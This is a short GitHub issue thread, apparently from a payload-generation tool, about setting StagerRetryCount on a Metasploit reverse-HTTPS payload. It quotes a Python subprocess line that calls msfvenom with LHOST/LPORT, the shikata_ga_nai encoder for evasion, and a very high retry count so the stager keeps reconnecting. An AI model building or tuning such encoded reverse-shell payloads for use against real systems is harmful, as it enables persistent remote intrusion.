-
Notifications
You must be signed in to change notification settings - Fork 332
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
StagerRetryCount help #77
Comments
You can set it in the following file: Add it to the correct payload that you are trying to use. EG reverse https = methttps_normal, so change the os command and add it after a semicolon |
thank you but i was meaning it to the generating payload for example in msfvenom : |
Line 75 in 809c970
Try changing it here |
= subprocess.Popen(['msfvenom', '-p', payload, 'LHOST=' + str(ip), 'LPORT=' + str(port), '-f', 'python', '-e', 'x86/shikata_ga_nai', 'StagerRetryCount=99999',], bufsize=1024, now it shows it cant execute script but when rewrited 'StagerRetryCount=99999' to 'StagerRetryCount=' + 99999 then it requests only 3 times |
This should work. If not please post the stack trace |
Hello how can i set StagerRetryCount on payload?
The text was updated successfully, but these errors were encountered: